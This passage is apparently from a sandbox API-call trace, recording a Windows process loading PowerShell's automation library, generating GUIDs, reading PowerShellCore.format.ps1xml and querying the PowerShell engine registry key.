	[0588.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0588.741] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0xd5548f6b, Data2=0xb3e8, Data3=0x40ce, Data4=([0]=0x92, [1]=0x11, [2]=0xf2, [3]=0x43, [4]=0xf1, [5]=0x70, [6]=0x43, [7]=0xe7))) returned 0x0
	[0588.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0588.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0588.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0588.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0588.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0588.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0588.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0588.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0588.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0588.743] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0xadb7f574, Data2=0xa67c, Data3=0x472a, Data4=([0]=0xa8, [1]=0x5, [2]=0xa4, [3]=0x5d, [4]=0xa1, [5]=0xb3, [6]=0x48, [7]=0x71))) returned 0x0
	[0588.743] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x39bb0f4, Data2=0x1ce3, Data3=0x4f8f, Data4=([0]=0xbf, [1]=0x4c, [2]=0x92, [3]=0x2, [4]=0x26, [5]=0x79, [6]=0xd5, [7]=0x52))) returned 0x0
	[0588.743] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0xea41c629, Data2=0x487d, Data3=0x4c4d, Data4=([0]=0xb1, [1]=0x72, [2]=0x9, [3]=0x6b, [4]=0x63, [5]=0xbb, [6]=0x49, [7]=0xdb))) returned 0x0
	[0588.743] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x82af7277, Data2=0x9c60, Data3=0x4788, Data4=([0]=0x8f, [1]=0x18, [2]=0x94, [3]=0xe7, [4]=0x9f, [5]=0x30, [6]=0xa0, [7]=0xaf))) returned 0x0
	[0588.743] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x833fbf3d, Data2=0x8127, Data3=0x4095, Data4=([0]=0x98, [1]=0xfd, [2]=0x6b, [3]=0x39, [4]=0x45, [5]=0x48, [6]=0xc, [7]=0xe0))) returned 0x0
	[0588.743] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x22a6ac3, Data2=0xfd37, Data3=0x443c, Data4=([0]=0xa8, [1]=0x85, [2]=0x45, [3]=0xa1, [4]=0xa4, [5]=0xcd, [6]=0x84, [7]=0x57))) returned 0x0
	[0588.743] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x9f7f2b09, Data2=0xefe, Data3=0x49ed, Data4=([0]=0xaa, [1]=0x13, [2]=0xb0, [3]=0x36, [4]=0xd1, [5]=0xcf, [6]=0xdb, [7]=0x9f))) returned 0x0
	[0588.744] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x6808f0f4, Data2=0x8eb5, Data3=0x4288, Data4=([0]=0x8c, [1]=0x9, [2]=0x7, [3]=0x9e, [4]=0xc2, [5]=0x37, [6]=0x0, [7]=0x77))) returned 0x0
	[0588.745] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0xbf8b61f0, Data2=0x218, Data3=0x4b94, Data4=([0]=0x88, [1]=0xe2, [2]=0xb4, [3]=0xcb, [4]=0x62, [5]=0x67, [6]=0xe5, [7]=0xdc))) returned 0x0
	[0588.746] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x3f058713, Data2=0xcce8, Data3=0x4be7, Data4=([0]=0xa5, [1]=0xdf, [2]=0x74, [3]=0x51, [4]=0x32, [5]=0x4a, [6]=0x93, [7]=0xf7))) returned 0x0
	[0588.746] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x59c5c483, Data2=0x7c8c, Data3=0x4484, Data4=([0]=0x90, [1]=0x9b, [2]=0x78, [3]=0x68, [4]=0x1f, [5]=0x19, [6]=0x23, [7]=0x47))) returned 0x0
	[0588.746] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0xe859c40f, Data2=0xb3d6, Data3=0x48b4, Data4=([0]=0xb8, [1]=0x50, [2]=0x64, [3]=0xf0, [4]=0x58, [5]=0xb3, [6]=0x22, [7]=0x5))) returned 0x0
	[0588.746] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x5107884d, Data2=0xc6f4, Data3=0x467a, Data4=([0]=0x91, [1]=0xc8, [2]=0x66, [3]=0x87, [4]=0x73, [5]=0xee, [6]=0x3b, [7]=0x7a))) returned 0x0
	[0588.746] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0xb735c2fc, Data2=0xc1c3, Data3=0x431d, Data4=([0]=0xad, [1]=0xc, [2]=0xf, [3]=0x5a, [4]=0x98, [5]=0xe7, [6]=0xc9, [7]=0x93))) returned 0x0
	[0588.746] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x39c99e2, Data2=0x6acf, Data3=0x48e3, Data4=([0]=0x80, [1]=0xb3, [2]=0x65, [3]=0x8e, [4]=0x82, [5]=0x7a, [6]=0x90, [7]=0x61))) returned 0x0
	[0588.747] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x2e42d1e3, Data2=0x72e1, Data3=0x49d2, Data4=([0]=0x92, [1]=0x6e, [2]=0x4d, [3]=0xc8, [4]=0x71, [5]=0xb3, [6]=0xbf, [7]=0xc4))) returned 0x0
	[0588.747] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0xc2a8bb97, Data2=0x85b3, Data3=0x406d, Data4=([0]=0xb9, [1]=0x80, [2]=0x3a, [3]=0xea, [4]=0xd4, [5]=0xff, [6]=0x2a, [7]=0x42))) returned 0x0
	[0588.747] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8
	[0588.747] GetFileType (hFile=0x2f8) returned 0x1
	[0588.747] SetErrorMode (uMode=0x1) returned 0x1
	[0588.747] GetFileType (hFile=0x2f8) returned 0x1
	[0588.747] ReadFile (in: hFile=0x2f8, lpBuffer=0x337a450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x337a450*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0588.752] ReadFile (in: hFile=0x2f8, lpBuffer=0x337a450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x337a450*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0588.755] ReadFile (in: hFile=0x2f8, lpBuffer=0x337a450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x337a450*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0588.755] ReadFile (in: hFile=0x2f8, lpBuffer=0x337a450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x337a450*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0588.755] ReadFile (in: hFile=0x2f8, lpBuffer=0x337a450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x337a450*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0588.756] ReadFile (in: hFile=0x2f8, lpBuffer=0x337a450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x337a450*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0588.756] ReadFile (in: hFile=0x2f8, lpBuffer=0x337a450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x337a450*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0588.756] ReadFile (in: hFile=0x2f8, lpBuffer=0x337a450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x337a450*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0588.756] ReadFile (in: hFile=0x2f8, lpBuffer=0x337a450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x337a450*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0588.758] ReadFile (in: hFile=0x2f8, lpBuffer=0x337a450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x337a450*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0588.758] ReadFile (in: hFile=0x2f8, lpBuffer=0x337a450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x337a450*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0588.758] ReadFile (in: hFile=0x2f8, lpBuffer=0x337a450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x337a450*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0588.758] ReadFile (in: hFile=0x2f8, lpBuffer=0x337a450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x337a450*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0588.759] ReadFile (in: hFile=0x2f8, lpBuffer=0x337a450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x337a450*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0588.759] ReadFile (in: hFile=0x2f8, lpBuffer=0x337a450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x337a450*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0588.759] ReadFile (in: hFile=0x2f8, lpBuffer=0x337a450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x337a450*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0588.760] ReadFile (in: hFile=0x2f8, lpBuffer=0x337a450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x337a450*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0588.762] ReadFile (in: hFile=0x2f8, lpBuffer=0x337a450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x337a450*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0588.763] ReadFile (in: hFile=0x2f8, lpBuffer=0x337a450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x337a450*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0588.763] ReadFile (in: hFile=0x2f8, lpBuffer=0x337a450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x337a450*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0588.763] ReadFile (in: hFile=0x2f8, lpBuffer=0x337a450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x337a450*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0588.764] ReadFile (in: hFile=0x2f8, lpBuffer=0x337a450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x337a450*, lpNumberOfBytesRead=0x22cf98*=0xe67, lpOverlapped=0x0) returned 1
	[0588.764] ReadFile (in: hFile=0x2f8, lpBuffer=0x3379a1f, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x3379a1f*, lpNumberOfBytesRead=0x22cf98*=0x0, lpOverlapped=0x0) returned 1
	[0588.764] ReadFile (in: hFile=0x2f8, lpBuffer=0x337a450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x337a450*, lpNumberOfBytesRead=0x22cf98*=0x0, lpOverlapped=0x0) returned 1
	[0588.764] CloseHandle (hObject=0x2f8) returned 1
	[0588.764] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22cce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0588.764] SetErrorMode (uMode=0x1) returned 0x1
	[0588.764] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x22cf40 | out: lpFileInformation=0x22cf40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0588.764] SetErrorMode (uMode=0x1) returned 0x1
	[0588.764] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22cc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0588.765] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d028 | out: phkResult=0x22d028*=0x2f8) returned 0x0
	[0588.765] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22cfac, lpData=0x0, lpcbData=0x22cfa8*=0x0 | out: lpType=0x22cfac*=0x1, lpData=0x0, lpcbData=0x22cfa8*=0x56) returned 0x0
	[0588.765] CoTaskMemAlloc (cb=0x5a) returned 0x3cd4f0
	[0588.765] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22cf7c, lpData=0x3cd4f0, lpcbData=0x22cf78*=0x56 | out: lpType=0x22cf7c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x22cf78*=0x56) returned 0x0
	[0588.765] CoTaskMemFree (pv=0x3cd4f0) 
	[0588.765] RegCloseKey (hKey=0x2f8) returned 0x0
	[0588.765] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22cc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0588.765] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0588.771] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x1dfc067b, Data2=0xf2c9, Data3=0x4ea1, Data4=([0]=0x9e, [1]=0x6b, [2]=0x28, [3]=0x81, [4]=0x85, [5]=0x98, [6]=0xfe, [7]=0x37))) returned 0x0
	[0588.772] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0xa0c2df62, Data2=0x975, Data3=0x4738, Data4=([0]=0x82, [1]=0xf7, [2]=0x49, [3]=0xde, [4]=0xc1, [5]=0x20, [6]=0xcf, [7]=0x7b))) returned 0x0
	[0588.772] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0xb53c1ee5, Data2=0xbe0, Data3=0x4b40, Data4=([0]=0x84, [1]=0x40, [2]=0x72, [3]=0x9b, [4]=0x5f, [5]=0x5c, [6]=0xa8, [7]=0x52))) returned 0x0
	[0588.772] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0xa8e88d5e, Data2=0x205d, Data3=0x4757, Data4=([0]=0xa3, [1]=0xc, [2]=0x62, [3]=0x61, [4]=0xfb, [5]=0xd8, [6]=0xa3, [7]=0xf5))) returned 0x0
	[0588.772] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x37a9cdfe, Data2=0xef4, Data3=0x477b, Data4=([0]=0xb0, [1]=0x9a, [2]=0x6e, [3]=0x7f, [4]=0x3c, [5]=0x32, [6]=0xf2, [7]=0xcd))) returned 0x0
	[0588.773] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x57fc2a8, Data2=0xb91d, Data3=0x4602, Data4=([0]=0x88, [1]=0x6, [2]=0x74, [3]=0xc4, [4]=0x27, [5]=0xf5, [6]=0xcc, [7]=0x98))) returned 0x0
	[0588.773] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0xd2b600d9, Data2=0xa166, Data3=0x4010, Data4=([0]=0xa5, [1]=0x55, [2]=0xf3, [3]=0x3, [4]=0x70, [5]=0x1d, [6]=0xd3, [7]=0xaf))) returned 0x0
	[0588.773] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x18846cf7, Data2=0x217b, Data3=0x48ee, Data4=([0]=0xb1, [1]=0xed, [2]=0xb4, [3]=0xd3, [4]=0xea, [5]=0x4f, [6]=0x17, [7]=0x15))) returned 0x0
	[0588.774] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0xfbd40f9c, Data2=0x3a9a, Data3=0x4d93, Data4=([0]=0x9c, [1]=0x7, [2]=0x22, [3]=0xbc, [4]=0x2, [5]=0x9a, [6]=0xf6, [7]=0xf0))) returned 0x0
	[0588.774] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x988bcd4e, Data2=0x4a5a, Data3=0x4393, Data4=([0]=0x95, [1]=0xf5, [2]=0xdb, [3]=0xcd, [4]=0x8, [5]=0x4d, [6]=0x26, [7]=0xd0))) returned 0x0
	[0588.774] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0xbbffab8a, Data2=0x3435, Data3=0x48e3, Data4=([0]=0xaa, [1]=0xe4, [2]=0x6e, [3]=0xe2, [4]=0x3, [5]=0x2b, [6]=0x52, [7]=0x94))) returned 0x0
	[0588.774] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0xdc93aa71, Data2=0xb470, Data3=0x4d62, Data4=([0]=0x9f, [1]=0xfa, [2]=0xdc, [3]=0x7b, [4]=0x7, [5]=0x2, [6]=0xfb, [7]=0x9b))) returned 0x0
	[0588.775] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x9e2650cd, Data2=0xcbc2, Data3=0x41b9, Data4=([0]=0x82, [1]=0xf, [2]=0x61, [3]=0x9e, [4]=0x34, [5]=0x3d, [6]=0x8a, [7]=0x84))) returned 0x0
	[0588.775] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0xf54557e9, Data2=0xf3ed, Data3=0x4133, Data4=([0]=0x9f, [1]=0x3a, [2]=0xef, [3]=0xc9, [4]=0x1, [5]=0xf4, [6]=0x45, [7]=0x70))) returned 0x0
	[0588.775] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x1833c94, Data2=0x42af, Data3=0x4295, Data4=([0]=0x8d, [1]=0x3a, [2]=0x49, [3]=0x1e, [4]=0x0, [5]=0x85, [6]=0x79, [7]=0x57))) returned 0x0
	[0588.775] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0xcd24c156, Data2=0x7e2, Data3=0x4ff7, Data4=([0]=0xa7, [1]=0x60, [2]=0xa4, [3]=0x3b, [4]=0xcd, [5]=0x2a, [6]=0x22, [7]=0x6d))) returned 0x0
	[0588.775] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0xc1dbf932, Data2=0xd394, Data3=0x4e81, Data4=([0]=0x92, [1]=0x77, [2]=0x27, [3]=0x32, [4]=0x6e, [5]=0xcd, [6]=0x1a, [7]=0x4d))) returned 0x0
	[0588.775] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0xd92ca59b, Data2=0x8a6c, Data3=0x4ece, Data4=([0]=0x85, [1]=0x68, [2]=0x82, [3]=0x35, [4]=0x85, [5]=0x92, [6]=0xa9, [7]=0xc7))) returned 0x0
	[0588.776] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x2bbe12a3, Data2=0xe839, Data3=0x4c9e, Data4=([0]=0x97, [1]=0x3d, [2]=0x66, [3]=0x5, [4]=0xba, [5]=0xb1, [6]=0x62, [7]=0x38))) returned 0x0
	[0588.777] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x21950723, Data2=0x234c, Data3=0x409e, Data4=([0]=0x80, [1]=0x19, [2]=0xdf, [3]=0x6, [4]=0x89, [5]=0xe0, [6]=0x77, [7]=0xb3))) returned 0x0
	[0588.777] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0xd1920e11, Data2=0x457a, Data3=0x4849, Data4=([0]=0xae, [1]=0x64, [2]=0xdb, [3]=0x8, [4]=0x98, [5]=0xee, [6]=0xe7, [7]=0x70))) returned 0x0
	[0588.777] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x3e4670cb, Data2=0x945a, Data3=0x4b9d, Data4=([0]=0xb5, [1]=0xb0, [2]=0x55, [3]=0xd0, [4]=0x14, [5]=0x9f, [6]=0xdd, [7]=0x2d))) returned 0x0
	[0588.778] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0xcbfa575f, Data2=0x5e03, Data3=0x42ec, Data4=([0]=0xa6, [1]=0x2, [2]=0x8c, [3]=0x16, [4]=0x66, [5]=0xf1, [6]=0x29, [7]=0x81))) returned 0x0
	[0588.778] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0xbf06a12, Data2=0x572, Data3=0x420d, Data4=([0]=0x84, [1]=0xf3, [2]=0x55, [3]=0x17, [4]=0x28, [5]=0xc9, [6]=0xff, [7]=0xe8))) returned 0x0
	[0588.792] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x852b2d02, Data2=0xbd82, Data3=0x4497, Data4=([0]=0x85, [1]=0x3, [2]=0x32, [3]=0xc1, [4]=0x8e, [5]=0xfe, [6]=0x46, [7]=0x38))) returned 0x0
	[0588.792] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0xf350d313, Data2=0x3367, Data3=0x4a9c, Data4=([0]=0x8b, [1]=0x6e, [2]=0x49, [3]=0x5e, [4]=0x28, [5]=0x6d, [6]=0xae, [7]=0x4d))) returned 0x0
	[0588.792] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x5b259098, Data2=0x2e1, Data3=0x463c, Data4=([0]=0xae, [1]=0x67, [2]=0x1b, [3]=0xcc, [4]=0x64, [5]=0x4d, [6]=0x49, [7]=0x71))) returned 0x0
	[0588.793] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x23d73a61, Data2=0xb16a, Data3=0x4fce, Data4=([0]=0xb0, [1]=0xeb, [2]=0x59, [3]=0xc6, [4]=0xec, [5]=0x2d, [6]=0x5d, [7]=0xa0))) returned 0x0
